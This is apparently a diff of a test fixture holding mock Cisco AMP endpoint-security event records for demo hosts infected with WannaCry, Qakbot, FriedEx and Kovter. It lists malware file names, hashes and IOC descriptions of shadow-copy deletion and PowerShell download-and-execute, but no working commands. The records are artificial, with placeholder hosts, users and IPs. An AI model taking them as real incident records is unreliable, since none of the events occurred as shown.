-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} 